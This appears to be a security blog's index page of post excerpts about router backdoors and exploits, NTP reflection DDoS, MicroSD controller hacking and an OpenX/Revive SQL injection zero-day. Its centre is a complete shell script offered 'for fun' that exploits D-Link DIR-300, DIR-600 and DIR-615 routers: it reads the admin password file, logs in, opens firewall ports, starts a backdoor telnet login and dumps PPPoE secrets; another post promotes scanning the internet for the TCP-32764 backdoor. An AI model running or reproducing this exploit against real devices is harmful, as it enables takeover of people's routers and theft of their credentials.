[HOWTO] Searching the internet for the TCP-32764 netgear exploit

This is a backdoor from last month. You can find it in GitHub.
Here, i’ll describe a quick and dirty way to search the internet for this exploit.

This exploit allows complete control of the affected host. You can download/upload files, get a root shell, PPPoE credentials, admin password, etc.

The idea was originally posted here, however, the post didn’t described how to do it. So, i’ll post a very quick post on how to do it.

DISCLAIMER: educational purposes only. Use at your own risk. I only wrote the minimalist bash script and the how to.

Some more info from the author of the exploit.

Probable source of the backdoor:

Backdoor LISTENING ON THE INTERNET confirmed in :

  • Linksys WAG120N (@p_w999)
  • Netgear DG834B V5.01.14 (@domainzero)
  • Netgear DGN2000 1.1.1, 1.1.11.0, 1.3.10.0, 1.3.11.0, 1.3.12.0 (issue 44)
  • Netgear WPNT834 (issue 79)
  • OpenWAG200 maybe a little bit TOO open 😉 (issue 49)

Backdoor confirmed in:

Backdoor may be present in:

Continue reading “[HOWTO] Searching the internet for the TCP-32764 netgear exploit”

D-Link DIR-300, DIR-600, DIR-615 (fw 4.0) remote root exploit

This is a remote root exploit for D-Link wireless routers DIR-300 (all versions), DIR-600 (all versions), DIR-615 (fw 4.0).

Have fun!

#!/bin/sh

if [ -z "$1" ]; then
echo "d-link DIR-300 (all), DIR-600 (all), DIR-615 (fw 4.0)";
echo "exploited by AKAT-1, 22733db72ab3ed94b5f8a1ffcde850251fe6f466, c8e74ebd8392fda4788179f9a02bb49337638e7b";
echo "usage: $0 [router address] [telnet port]";
exit 0;
fi;

if [ -z "$2" ]; then
TPORT=3333;
else
TPORT=$2;
fi

UPORT=31337;

echo "Trying $1 ...";

HTTPASSWD=`curl -sS "<a href="http://%241/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd%22" rel="nofollow">http://$1/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd"</a>; | grep -A1 "&lt;center&gt;" | tail -1 |
sed -e "s/\t//g ; s/^\([^:]*\):\([^:]*\)$/\1\n \2/g"`;

if [ ! -z "$HTTPASSWD" ]; then
L=`echo $HTTPASSWD | cut -d' ' -f1`;
P=`echo $HTTPASSWD | cut -d' ' -f2`;

echo "found username: $L";
echo "found password: $P";

curl -d "ACTION_POST=LOGIN&amp;LOGIN_USER=$L&amp;LOGIN_PASSWD=$P" -sS "<a href="http://%241/login.php%22" rel="nofollow">http://$1/login.php"</a>; | grep -v "fail"
1&gt;/dev/null;

if [ $? -eq 0 ]; then
curl -sS
"<a href="http://%241/tools_system.xgi?random_num=2011.9.22.13.59.33&amp;exeshell=../../../../usr/sbin/iptables" rel="nofollow">http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&amp;exeshell=../../../../usr/sbin/iptables</a> -t nat -A PRE_MISC -i
eth0.2 -p tcp --dport $TPORT -j ACCEPT&amp;set/runtime/syslog/sendmail=1" 1&gt;/dev/null;
curl -sS
"<a href="http://%241/tools_system.xgi?random_num=2011.9.22.13.59.33&amp;exeshell=../../../../usr/sbin/iptables" rel="nofollow">http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&amp;exeshell=../../../../usr/sbin/iptables</a> -t nat -A PRE_MISC -i
eth0.2 -p tcp --dport $UPORT -j ACCEPT&amp;set/runtime/syslog/sendmail=1" 1&gt;/dev/null;
curl -sS
"<a href="http://%241/tools_system.xgi?random_num=2011.9.22.13.59.33&amp;exeshell=../../../../usr/sbin/telnetd" rel="nofollow">http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&amp;exeshell=../../../../usr/sbin/telnetd</a> -p $TPORT -l
/usr/sbin/login -u hacked:me&amp;set/runtime/syslog/sendmail=1" 1&gt;/dev/null;

echo "if you are lucky telnet is listening on $TPORT (hacked:me) ..."
curl -sS "<a href="http://%241/logout.php%22" rel="nofollow">http://$1/logout.php"</a>; 1&gt;/dev/null;
fi
fi

CHAP=`curl -sS "<a href="http://%241/model/__show_info.php?REQUIRE_FILE=/etc/ppp/chap-secrets%22" rel="nofollow">http://$1/model/__show_info.php?REQUIRE_FILE=/etc/ppp/chap-secrets"</a>; | grep -A1 "&lt;center&gt;" | sed -e
"s/&lt;center&gt;//g"`;

if [ ! -z "$CHAP" ]; then
echo "found chap-secrets: $CHAP";
fi

echo "Bye bye.";

exit 0;

NTP based DDoS attack – understanding NTP reflection

Behind a reflection attack

A reflection attack works when an attacker can send a packet with a forged source IP address. The attacker sends a packet apparently from the intended victim to some server on the Internet that will reply immediately. Because the source IP address is forged, the remote Internet server replies and sends data to the victim.

That has two effects: the actual source of the attack is hidden and is very hard to trace, and, if many Internet servers are used, an attack can consist of an overwhelming number of packets hitting a victim from all over the world.

But what makes reflection attacks really powerful is when they are also amplified: when a small forged packet elicits a large reply from the server (or servers). In that case, an attacker can send a small packet “from” a forged source IP address and have the server (or servers) send large replies to the victim.

Amplification attacks like that result in an attacker turning a small amount of bandwidth coming from a small number of machines into a massive traffic load hitting a victim from around the Internet. Until recently the most popular protocol for amplification attacks was DNS: a small DNS query looking up the IP address of a domain name would result in a large reply.

NTP DDoS Amplification Attack
NTP DDoS Amplification Attack

For DNS the amplification factor (how much larger a reply is than a request) is 8x. So an attacker can generate an attack 8x larger than the bandwidth they themselves have access to. For example, an attacker controlling 10 machines with 1Gbps could generate an 80Gbps DNS amplification attack.

In the past, we’ve seen one attack that used SNMP for amplification: it has a factor of 650x! Luckily, there are few open SNMP servers on the Internet and SNMP usually requires authentication (although many are poorly secured). That makes SNMP attacks relatively rare.

The new kid on the block today is NTP. Continue reading “NTP based DDoS attack – understanding NTP reflection”

Hacking MicroSD cards

You should read the latest on hacking MicroSD cards by Bunnie Studios (http://www.bunniestudios.com/blog/?p=3554).

Some points to consider:

  • Every card has a ARM microcontroller;
  • Flash is usually bad, but it doesn’t go to waste. a 16GB card with 80% bad flash can be sold as a 2GB one;
  • Remember number 1? It can allow arbitrary code execution.
MicroSD Card controller
MicroSD Card controller

 

 

Interested on reading more?

This is the whole write up – http://bunniefoo.com/bunnie/sdcard-30c3-pub.pdf – and here’s the whole video. Enjoy!

Zero Day Vulnerability in OpenX Source 2.8.11 and Revive Adserver 3.0.1

The current versions of the popular ad server software OpenX Source (2.8.11) and Revive Adserver (3.0.1) are vulnerable a sql injection attack which allows attackers to gain backend access. The vulnerability is actively being exploited.

Read more about it here.